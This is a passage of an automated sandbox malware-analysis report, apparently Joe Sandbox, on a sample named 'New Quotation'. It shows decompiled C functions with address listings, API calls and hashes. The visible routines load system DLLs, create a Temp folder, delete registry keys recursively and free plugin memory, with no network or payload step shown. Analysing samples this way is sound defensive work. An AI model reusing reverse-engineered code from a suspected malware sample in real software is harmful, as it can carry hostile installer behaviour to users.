                                                                                                                                                                                          0x00402878
                                                                                                                                                                                          0x0040285d
                                                                                                                                                                                          0x0040285d
                                                                                                                                                                                          0x00402860
                                                                                                                                                                                          0x00402863
                                                                                                                                                                                          0x00402866
                                                                                                                                                                                          0x00402866
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402817
                                                                                                                                                                                          0x00402817
                                                                                                                                                                                          0x0040281a
                                                                                                                                                                                          0x0040281d
                                                                                                                                                                                          0x00402823
                                                                                                                                                                                          0x00402827
                                                                                                                                                                                          0x0040282a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040282a
                                                                                                                                                                                          0x0040280e
                                                                                                                                                                                          0x00402807
                                                                                                                                                                                          0x0040277f
                                                                                                                                                                                          0x0040276b
                                                                                                                                                                                          0x00402760
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040282c
                                                                                                                                                                                          0x0040282c
                                                                                                                                                                                          0x0040282f
                                                                                                                                                                                          0x00402838
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040272f
                                                                                                                                                                                          0x0040271a
                                                                                                                                                                                          0x00402c33
                                                                                                                                                                                          0x00402c39

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ReadFile.KERNELBASE(?,?,?,?), ref: 00402758
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                                                                                                                                                          • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                                                                                                                                                            • Part of subcall function 0040610E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406124
                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                                                          • String ID: 9
                                                                                                                                                                                          • API String ID: 163830602-2366072709
                                                                                                                                                                                          • Opcode ID: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                                                                                                                                                                          • Instruction ID: 36eba916602f65c1f8b814f2f26102ddc75cc08ed25eda7b441ea0696c55e726
                                                                                                                                                                                          • Opcode Fuzzy Hash: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                                                                                                                                                                          • Instruction Fuzzy Hash: C551E975D00219AADF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040689A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 916 40689a-4068ba GetSystemDirectoryW 917 4068bc 916->917 918 4068be-4068c0 916->918 917->918 919 4068d1-4068d3 918->919 920 4068c2-4068cb 918->920 922 4068d4-406907 wsprintfW LoadLibraryExW 919->922 920->919 921 4068cd-4068cf 920->921 921->922
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E0040689A(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}








                                                                                                                                                                                          0x004068b1
                                                                                                                                                                                          0x004068ba
                                                                                                                                                                                          0x004068bc
                                                                                                                                                                                          0x004068bc
                                                                                                                                                                                          0x004068c0
                                                                                                                                                                                          0x004068d3
                                                                                                                                                                                          0x004068cd
                                                                                                                                                                                          0x004068cd
                                                                                                                                                                                          0x004068cd
                                                                                                                                                                                          0x004068ec
                                                                                                                                                                                          0x00406900
                                                                                                                                                                                          0x00406907

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                                                                                                                                                          • wsprintfW.USER32 ref: 004068EC
                                                                                                                                                                                          • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                          • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                                                          • API String ID: 2200240437-1946221925
                                                                                                                                                                                          • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                                                                                                                          • Instruction ID: 21628a1c63ce2f140fdd4d546058f3b0ba52bdb51e88dcb335987c0e659eada7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                                                                                                                          • Instruction Fuzzy Hash: D0F0F671511119ABDB10BB64DD0DF9B376CBF00305F10847AA646F10D0EB7CDA68CBA8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00405A6E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 923 405a6e-405ab9 CreateDirectoryW 924 405abb-405abd 923->924 925 405abf-405acc GetLastError 923->925 926 405ae6-405ae8 924->926 925->926 927 405ace-405ae2 SetFileSecurityW 925->927 927->924 928 405ae4 GetLastError 927->928 928->926
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00405A6E(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                                                                                                                                                          0x00405a79
                                                                                                                                                                                          0x00405a7d
                                                                                                                                                                                          0x00405a80
                                                                                                                                                                                          0x00405a86
                                                                                                                                                                                          0x00405a8a
                                                                                                                                                                                          0x00405a8e
                                                                                                                                                                                          0x00405a96
                                                                                                                                                                                          0x00405a9d
                                                                                                                                                                                          0x00405aa3
                                                                                                                                                                                          0x00405aaa
                                                                                                                                                                                          0x00405ab1
                                                                                                                                                                                          0x00405ab9
                                                                                                                                                                                          0x00405abb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405abb
                                                                                                                                                                                          0x00405ac5
                                                                                                                                                                                          0x00405acc
                                                                                                                                                                                          0x00405ae2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405ae4
                                                                                                                                                                                          0x00405ae8

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00405AC5
                                                                                                                                                                                          • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADA
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00405AE4
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A94
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                          • API String ID: 3449924974-3355392842
                                                                                                                                                                                          • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                                                                                                                          • Instruction ID: 637b0a295f6611997b04f2fb2f8121e2d74ae93851c1d74b8ff7b710bfe1865b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A010871D04219EAEF019BA0DD84BEFBBB4EB14314F00813AD545B6281E7789648CFE9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 929 402ea9-402ed2 call 4063aa 931 402ed7-402edb 929->931 932 402ee1-402ee5 931->932 933 402f8c-402f90 931->933 934 402ee7-402f08 RegEnumValueW 932->934 935 402f0a-402f1d 932->935 934->935 936 402f71-402f7f RegCloseKey 934->936 937 402f46-402f4d RegEnumKeyW 935->937 936->933 938 402f1f-402f21 937->938 939 402f4f-402f61 RegCloseKey call 40690a 937->939 938->936 941 402f23-402f37 call 402ea9 938->941 944 402f81-402f87 939->944 945 402f63-402f6f RegDeleteKeyW 939->945 941->939 947 402f39-402f45 941->947 944->933 945->933 947->937
                                                                                                                                                                                          C-Code - Quality: 48%
                                                                                                                                                                                          			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004063AA(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8); // executed
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E0040690A(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                                                                                                                                                                                          0x00402eb4
                                                                                                                                                                                          0x00402ebd
                                                                                                                                                                                          0x00402ec6
                                                                                                                                                                                          0x00402ed2
                                                                                                                                                                                          0x00402edb
                                                                                                                                                                                          0x00402ee5
                                                                                                                                                                                          0x00402f0a
                                                                                                                                                                                          0x00402f10
                                                                                                                                                                                          0x00402f15
                                                                                                                                                                                          0x00402f16
                                                                                                                                                                                          0x00402f46
                                                                                                                                                                                          0x00402f1f
                                                                                                                                                                                          0x00402f21
                                                                                                                                                                                          0x00402f71
                                                                                                                                                                                          0x00402f74
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402f7a
                                                                                                                                                                                          0x00402f30
                                                                                                                                                                                          0x00402f35
                                                                                                                                                                                          0x00402f37
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402f3f
                                                                                                                                                                                          0x00402f44
                                                                                                                                                                                          0x00402f45
                                                                                                                                                                                          0x00402f45
                                                                                                                                                                                          0x00402f52
                                                                                                                                                                                          0x00402f5a
                                                                                                                                                                                          0x00402f61
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402f8a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402f69
                                                                                                                                                                                          0x00402ef5
                                                                                                                                                                                          0x00402f08
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402f08
                                                                                                                                                                                          0x00402f90

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                                                                                                                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                                                                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseEnum$DeleteValue
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1354259210-0
                                                                                                                                                                                          • Opcode ID: 8cb330a57336db5e00a931244e28e0c1e8cbbd051d222c2bd1499622aecedac4
                                                                                                                                                                                          • Instruction ID: ca6229ec891c5908b4c2d3bab14ae3db7b9396451d72a40731f1c02386a45f13
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8cb330a57336db5e00a931244e28e0c1e8cbbd051d222c2bd1499622aecedac4
                                                                                                                                                                                          • Instruction Fuzzy Hash: DA215A7150010ABBEF119F90CE89EEF7B7DEB50384F100076F909B21A0D7B49E54AA68
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 71091817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 948 71091817-71091856 call 71091bff 952 7109185c-71091860 948->952 953 71091976-71091978 948->953 954 71091869-71091876 call 71092480 952->954 955 71091862-71091868 call 7109243e 952->955 960 71091878-7109187d 954->960 961 710918a6-710918ad 954->961 955->954 964 71091898-7109189b 960->964 965 7109187f-71091880 960->965 962 710918cd-710918d1 961->962 963 710918af-710918cb call 71092655 call 71091654 call 71091312 GlobalFree 961->963 969 7109191e-71091924 call 71092655 962->969 970 710918d3-7109191c call 71091666 call 71092655 962->970 986 71091925-71091929 963->986 964->961 971 7109189d-7109189e call 71092e23 964->971 967 71091888-71091889 call 71092b98 965->967 968 71091882-71091883 965->968 981 7109188e 967->981 974 71091890-71091896 call 71092810 968->974 975 71091885-71091886 968->975 969->986 970->986 984 710918a3 971->984 985 710918a5 974->985 975->961 975->967 981->984 984->985 985->961 990 7109192b-71091939 call 71092618 986->990 991 71091966-7109196d 986->991 998 7109193b-7109193e 990->998 999 71091951-71091958 990->999 991->953 996 7109196f-71091970 GlobalFree 991->996 996->953 998->999 1000 71091940-71091948 998->1000 999->991 1001 7109195a-71091965 call 710915dd 999->1001 1000->999 1002 7109194a-7109194b FreeLibrary 1000->1002 1001->991 1002->999
                                                                                                                                                                                          C-Code - Quality: 88%
                                                                                                                                                                                          			E71091817(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				char _v136;
				struct HINSTANCE__* _t37;
				void* _t39;
				intOrPtr _t42;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t54;
				intOrPtr _t57;
				signed int _t61;
				signed int _t63;
				void* _t67;
				void* _t68;
				void* _t72;
				void* _t76;

				_t76 = __esi;
				_t68 = __edi;
				_t67 = __edx;
				 *0x7109506c = _a8;
				 *0x71095070 = _a16;
				 *0x71095074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x71095048, E71091651);
				_push(1); // executed
				_t37 = E71091BFF(); // executed
				_t54 = _t37;
				if(_t54 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t54 + 4)) != 1) {
						E7109243E(_t54);
					}
					_push(_t54);
					E71092480(_t67);
					_t57 =  *((intOrPtr*)(_t54 + 4));
					if(_t57 == 0xffffffff) {
						L14:
						if(( *(_t54 + 0x1010) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t54 + 4)) == 0) {
								_push(_t54);
								_t37 = E71092655();
							} else {
								_push(_t76);
								_push(_t68);
								_t61 = 8;
								_t13 = _t54 + 0x1018; // 0x1018
								memcpy( &_v36, _t13, _t61 << 2);
								_t42 = E71091666(_t54,  &_v136);
								 *(_t54 + 0x1034) =  *(_t54 + 0x1034) & 0x00000000;
								_t18 = _t54 + 0x1018; // 0x1018
								_t72 = _t18;
								_push(_t54);
								 *((intOrPtr*)(_t54 + 0x1020)) = _t42;
								 *_t72 = 4;
								E71092655();
								_t63 = 8;
								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
							}
						} else {
							_push(_t54);
							E71092655();
							_t37 = GlobalFree(E71091312(E71091654(_t54)));
						}
						if( *((intOrPtr*)(_t54 + 4)) != 1) {
							_t37 = E71092618(_t54);
							if(( *(_t54 + 0x1010) & 0x00000040) != 0 &&  *_t54 == 1) {
								_t37 =  *(_t54 + 0x1008);
								if(_t37 != 0) {
									_t37 = FreeLibrary(_t37);
								}
							}
							if(( *(_t54 + 0x1010) & 0x00000020) != 0) {
								_t37 = E710915DD( *0x71095068);
							}
						}
						if(( *(_t54 + 0x1010) & 0x00000002) != 0) {
							goto L28;
						} else {
							_t39 = GlobalFree(_t54); // executed
							return _t39;
						}
					}
					_t48 =  *_t54;
					if(_t48 == 0) {
						if(_t57 != 1) {
							goto L14;
						}
						E71092E23(_t54);
						L12:
						_t54 = _t48;
						L13:
						goto L14;
					}
					_t49 = _t48 - 1;
					if(_t49 == 0) {
						L8:
						_t48 = E71092B98(_t57, _t54); // executed
						goto L12;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						E71092810(_t54);
						goto L13;
					}
					if(_t50 != 1) {
						goto L14;
					}
					goto L8;
				}
			}



















                                                                                                                                                                                          0x71091817
                                                                                                                                                                                          0x71091817
                                                                                                                                                                                          0x71091817
                                                                                                                                                                                          0x71091824
                                                                                                                                                                                          0x7109182c
                                                                                                                                                                                          0x71091839
                                                                                                                                                                                          0x71091847
                                                                                                                                                                                          0x7109184a
                                                                                                                                                                                          0x7109184c
                                                                                                                                                                                          0x71091851
                                                                                                                                                                                          0x71091856
                                                                                                                                                                                          0x71091978
                                                                                                                                                                                          0x71091978
                                                                                                                                                                                          0x7109185c
                                                                                                                                                                                          0x71091860
                                                                                                                                                                                          0x71091863
                                                                                                                                                                                          0x71091868
                                                                                                                                                                                          0x71091869
                                                                                                                                                                                          0x7109186a
                                                                                                                                                                                          0x71091870
                                                                                                                                                                                          0x71091876
                                                                                                                                                                                          0x710918a6
                                                                                                                                                                                          0x710918ad
                                                                                                                                                                                          0x710918d1
                                                                                                                                                                                          0x7109191e
                                                                                                                                                                                          0x7109191f
                                                                                                                                                                                          0x710918d3
                                                                                                                                                                                          0x710918d3
                                                                                                                                                                                          0x710918d4
                                                                                                                                                                                          0x710918dd
                                                                                                                                                                                          0x710918de
                                                                                                                                                                                          0x710918e8
                                                                                                                                                                                          0x710918eb
                                                                                                                                                                                          0x710918f0
                                                                                                                                                                                          0x710918f7
                                                                                                                                                                                          0x710918f7
                                                                                                                                                                                          0x710918fd
                                                                                                                                                                                          0x710918fe
                                                                                                                                                                                          0x71091904
                                                                                                                                                                                          0x7109190a
                                                                                                                                                                                          0x71091917
                                                                                                                                                                                          0x71091918
                                                                                                                                                                                          0x7109191b
                                                                                                                                                                                          0x710918af
                                                                                                                                                                                          0x710918af
                                                                                                                                                                                          0x710918b0
                                                                                                                                                                                          0x710918c5
                                                                                                                                                                                          0x710918c5
                                                                                                                                                                                          0x71091929
                                                                                                                                                                                          0x7109192c
                                                                                                                                                                                          0x71091939
                                                                                                                                                                                          0x71091940
                                                                                                                                                                                          0x71091948
                                                                                                                                                                                          0x7109194b
                                                                                                                                                                                          0x7109194b
                                                                                                                                                                                          0x71091948
                                                                                                                                                                                          0x71091958
                                                                                                                                                                                          0x71091960
                                                                                                                                                                                          0x71091965
                                                                                                                                                                                          0x71091958
                                                                                                                                                                                          0x7109196d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x7109196f
                                                                                                                                                                                          0x71091970
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x71091970
                                                                                                                                                                                          0x7109196d
                                                                                                                                                                                          0x7109187a
                                                                                                                                                                                          0x7109187d
                                                                                                                                                                                          0x7109189b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x7109189e
                                                                                                                                                                                          0x710918a3
                                                                                                                                                                                          0x710918a3
                                                                                                                                                                                          0x710918a5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x710918a5
                                                                                                                                                                                          0x7109187f
                                                                                                                                                                                          0x71091880
                                                                                                                                                                                          0x71091888
                                                                                                                                                                                          0x71091889
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x71091889
                                                                                                                                                                                          0x71091882
                                                                                                                                                                                          0x71091883
                                                                                                                                                                                          0x71091891
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x71091891
                                                                                                                                                                                          0x71091886
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x71091886

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 71091BFF: GlobalFree.KERNEL32(?), ref: 71091E74
                                                                                                                                                                                            • Part of subcall function 71091BFF: GlobalFree.KERNEL32(?), ref: 71091E79
                                                                                                                                                                                            • Part of subcall function 71091BFF: GlobalFree.KERNEL32(?), ref: 71091E7E
                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 710918C5
                                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 7109194B
                                                                                                                                                                                          • GlobalFree.KERNELBASE(00000000), ref: 71091970
                                                                                                                                                                                            • Part of subcall function 7109243E: GlobalAlloc.KERNEL32(00000040,?), ref: 7109246F
                                                                                                                                                                                            • Part of subcall function 71092810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,71091896,00000000), ref: 710928E0
                                                                                                                                                                                            • Part of subcall function 71091666: wsprintfW.USER32 ref: 71091694
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49416621160.0000000071091000.00000020.00000001.01000000.00000004.sdmp, Offset: 71090000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49416572287.0000000071090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49416671437.0000000071094000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49416703508.0000000071096000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_71090000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Global$Free$Alloc$Librarywsprintf
